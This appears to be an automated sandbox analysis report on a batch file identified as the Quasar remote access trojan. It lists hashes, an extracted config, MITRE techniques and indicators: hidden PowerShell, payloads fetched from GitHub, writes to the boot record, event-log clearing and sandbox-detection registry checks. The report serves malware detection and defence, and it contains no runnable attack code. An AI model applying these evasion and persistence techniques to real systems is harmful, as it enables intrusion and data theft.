quasar | c07250a2ea7a8523defaa97352e48b28106c21a111c81285a9ab0a34843bdc0d

Resubmissions

28-12-2024 23:21

241228-3cea8svmcx 10

28-12-2024 23:15

241228-28pw6svnfk 10

Analysis

max time kernel
44s
max time network
43s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28-12-2024 23:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Loli.bat
Size

7.3MB
MD5

d96987d5645d0a45dc0830e166db747e
SHA1

ffe0eb0aaca891bba84dd508accdbbc2df6d59f9
SHA256

c07250a2ea7a8523defaa97352e48b28106c21a111c81285a9ab0a34843bdc0d
SHA512

43d8c564977621e9368023aa3b7405b52e3d5a0d9e4c4cd4e9755be5023f59d23408cf7d50c388865d4d9215789917d5d099e66614fbb08fab38f65b94c6fa4b
SSDEEP

49152:DaNZgAgNBABjEgJfptzhAZ4TNiuEq9oRmcXMLEg4y07s8HuxsTZAOcHqjEItFHEH:4

Score

10^/10

quasar bootkit defense_evasion discovery execution persistence spyware trojan

Malware Config

Extracted

Family

quasar

Attributes

encryption_key
03816C045CDE13385E227545D99CA4F0BBE6CC9F
reconnect_delay
3000

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral2/memory/5036-1963-0x000001CDFE0D0000-0x000001CDFE83E000-memory.dmp	family_quasar

Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 4168 created 3752	4168	WerFault.exe	141
PID 980 created 5900	980	WerFault.exe	134

Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs

description	pid	Process	procid_target
PID 4576 created 616	4576	powershell.exe	5
PID 5036 created 616	5036	powershell.exe	5
PID 6000 created 616	6000	onibye.exe	5
PID 5900 created 616	5900	onibye.exe	5
PID 528 created 3752	528	svchost.exe	141
PID 528 created 5900	528	svchost.exe	134

Blocklisted process makes network request 2 IoCs

flow	pid	Process
34	5036	powershell.exe
65	5036	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4576	powershell.exe
5036	powershell.exe

Downloads MZ/PE file

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p"	WaaSMedicAgent.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Executes dropped EXE 4 IoCs

pid	Process
5684	iHGIHk.exe
6000	onibye.exe
5900	onibye.exe
3752	onibye.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx	svchost.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\M:	svchost.exe
File opened (read-only)	\??\W:	svchost.exe
File opened (read-only)	\??\Y:	svchost.exe
File opened (read-only)	\??\B:	svchost.exe
File opened (read-only)	\??\L:	svchost.exe
File opened (read-only)	\??\H:	svchost.exe
File opened (read-only)	\??\J:	svchost.exe
File opened (read-only)	\??\P:	svchost.exe
File opened (read-only)	\??\Q:	svchost.exe
File opened (read-only)	\??\R:	svchost.exe
File opened (read-only)	\??\T:	svchost.exe
File opened (read-only)	\??\E:	svchost.exe
File opened (read-only)	\??\G:	svchost.exe
File opened (read-only)	\??\O:	svchost.exe
File opened (read-only)	\??\V:	svchost.exe
File opened (read-only)	\??\A:	svchost.exe
File opened (read-only)	\??\N:	svchost.exe
File opened (read-only)	\??\S:	svchost.exe
File opened (read-only)	\??\U:	svchost.exe
File opened (read-only)	\??\X:	svchost.exe
File opened (read-only)	\??\Z:	svchost.exe
File opened (read-only)	\??\I:	svchost.exe
File opened (read-only)	\??\K:	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
46	raw.githubusercontent.com
47	raw.githubusercontent.com
64	raw.githubusercontent.com

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	wmiprvse.exe

Drops file in System32 directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D	lsass.exe
File opened for modification	C:\Windows\System32\Tasks\$nya-vdsJkq3S	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4576 set thread context of 2808	4576	powershell.exe	100
PID 5036 set thread context of 5780	5036	powershell.exe	119

Drops file in Windows directory 10 IoCs

description	ioc	Process
File opened for modification	C:\Windows\$rbx-onimai2	powershell.exe
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File opened for modification	C:\Windows\$nya-onimai2	powershell.exe
File created	C:\Windows\$rbx-onimai2\$rbx-CO2.bat	cmd.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe
File created	C:\Windows\$nya-onimai2\iHGIHk.exe	powershell.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe

Checks processor information in registry 2 TTPs 14 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe

Enumerates system info in registry 2 TTPs 10 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02gigefeqqnyaeub\Provision Saturday, December 28, 2024 23:15:38 = "AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAppIU89Zza02FmB+I4UVSKwAAAAACAAAAAAAQZgAAAAEAACAAAABSAd0NMczVKpKQjUA0nTah4WaGA7Be9qLJoCjIz48fHAAAAAAOgAAAAAIAACAAAAApE1hp71GjlXLBFO7ahEi49tgiymnhoYrTCkgd9OCuEyAAAAAV27V7raIatqNdYktIKgX2UsJGxun9DiKuTF3VbK8xnkAAAACWfde7BRKW3VSFWMMWwU7yYgkH8gf16sba74zmCz6XlUU4J9zk4gn1nV0tVhCrHf/mPaaZ9IJsmxFdA4yLlLai"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	WaaSMedicAgent.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3756129449-3121373848-4276368241-1000\02ygmmrhejyrygsu\Reason = "2147780641"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion	mousocoreworker.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3756129449-3121373848-4276368241-1000\02semdfilfmqarqt\DeviceId = "<Data><User username=\"02SEMDFILFMQARQT\"><HardwareInfo BoundTime=\"1735427741\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018C0109E218F33"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1"	mousocoreworker.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\ValidDeviceId = "02gigefeqqnyaeub"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	onibye.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC\P3P = "CP=\"CAO DSP COR ADMa DEV CONo TELo CUR PSA PSD TAI IVDo OUR SAMi BUS DEM NAV STA UNI COM INT PHY ONL FIN PUR LOCi CNT\""	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager	mousocoreworker.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02gigefeqqnyaeub\DeviceId = "<Data LastUpdatedTime=\"1735427739\"><User username=\"02GIGEFEQQNYAEUB\"><HardwareInfo BoundTime=\"1735427739\" TpmKeyStateClient=\"1\" TpmKeyStateServer=\"3\" LicenseKeySequence=\"1\" LicenseInstallError=\"0\" LicenseKeyVersion=\"2\"/></User></Data>\r\n"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	mousocoreworker.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "0018C0109E218F33"	mousocoreworker.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3756129449-3121373848-4276368241-1000\02semdfilfmqarqt\DeviceId = "<Data DAInvalidationTime=\"1735427742\"><User username=\"02SEMDFILFMQARQT\"><HardwareInfo BoundTime=\"1735427741\" TpmKeyStateClient=\"0\" TpmKeyStateServer=\"0\" LicenseInstallError=\"0\"/></User></Data>\r\n"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}	mousocoreworker.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000a69214f3d6736b4d85981f88e145522b000000000200000000001066000000010000200000000e581db7ba451d5aa14676509292f6073bc991e37918a00617bc059625668252000000000e800000000200002000000065e4a84a44431c1a8e93796ea653c20ff15622ea3553a5c18ba7d25ba83fba62b0030000b86f8cb0d2fa2a9ba614a6f29f1fd32c5809e282af7c11cdc27722d796f8b483d0503fec4a9393d883a025567e9978440cca71e557a104f389dbd1feb5a4ffa3d9f7b5152199b9c5305aa4ab7766120e30fade324010d4ed571fbf75413191f5ec376890fcf1697ff088eb3f7a809fff2c24572cf1c2156f6a4a8a883df3b30a9d0ce2a54de9b9d9c5245d019f80b05091edfbc141044bc73890da9670165dbc91573e9619ef1dc5a29e833f8c80c86be74eda23bdd45db6ca770dbf85185ed2b92e706eb98ce9edff4e49665a78dd9a936e007ff11fd7315e8b228dd2765c61fca164e4a02d9941b9bd2937093953f17e11f6ea03c816bee1198b6e03e0b0d3d1770201493807a5421bfccb16f6d6d24742dd30b6d0af69df293dd3fb56131c32d9a7ec353a46ed11b3c6b9ee9fecc59e4f92f9aac84183a38789359f65efc41eda908a077869ed2cb1c3d3f476e03e1059389bba03e93f6cc0696b3a7058e26d121d51de59729a0453bf3b8743f1189efd2640bf7ecf58c797cef66a8a8900c1eb0c81dcc0d9ef121b31bd2f38acc697bd7f9c17d14df2c244a18deaf5d187305bec2687befccdefeec89e61b89644cf8dbe14c67ca4e2722a8e2b6a145866f0d88bfd3d7f9d7a13cbcf0f0eeb508c42bbc11a3962ba9ccbc2909c77bf0bc275c4e9c160a9f92161a1fed266c3273088a0165fdd8559b15c1fd6efd1e43d736bc85b61f7f21140abd658c8b560f29d389c00fc511efdf1a6716429273c8c1f8bdb32f075069038d630ce9e001b79a3e5b20328abcce5e34b9eb17becb040476310b439f76e7e5dc5b2a67463978d530388e9c1f0a704f0f75c6e7d72fd59e0a2985d5777dab0f03cd0aae68e59ba8d0e68b44a3c4b49ba3820755cb232cce61c11475d7c9f9b3e52d3154e46353516a13b503022a6712fa402e811f4dea219797d3b6418af2d6cef867074ba2bb9464af7d15658d6e2cd000b082239e17d31d5a93ed809758acc4e818bd770d23987add9b5b3e4fdef91b122b3ff1760969a2b1e9c8dc2c78882d45cb65c3cc8dd7cae26b121822a8c4d613b03f3fc23e1d8c25fdb7c3e95ec34c07909b10961f94d467b134ed390561fe90dfca6e3cc5be59dc132206af96a80f4f1f46d051dd9acc10f24a2cae4c69c02bd2d5954836253e348e5641e979d19cebd84bb3a8c76b81b2f885faef7507badc486b4951d43dd2612a608b2de00a8ad6042e32540943f158e5a3714614b3946bdcee65d1dad23ee3f913401b2965ff5d935b7a04faba07aa4a2bc73a00b0db4a25415ff354bc653d57715d8b63c18602e8674dc5cd2f84000000082ca52b02ee9e25cb9e802ed1ee2c6c5803303da832c88b1195f3e1bb1fa4bd03b41530b7b96044a8b2e84785fd078808f19a8dffdb697580f722a49d1257455	mousocoreworker.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02gigefeqqnyaeub\AppIdList = "{AFDA72BF-3409-413A-B54E-2AB8D66A7826};"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02ygmmrhejyrygsu\Response Saturday, December 28, 2024 23:15:39 = "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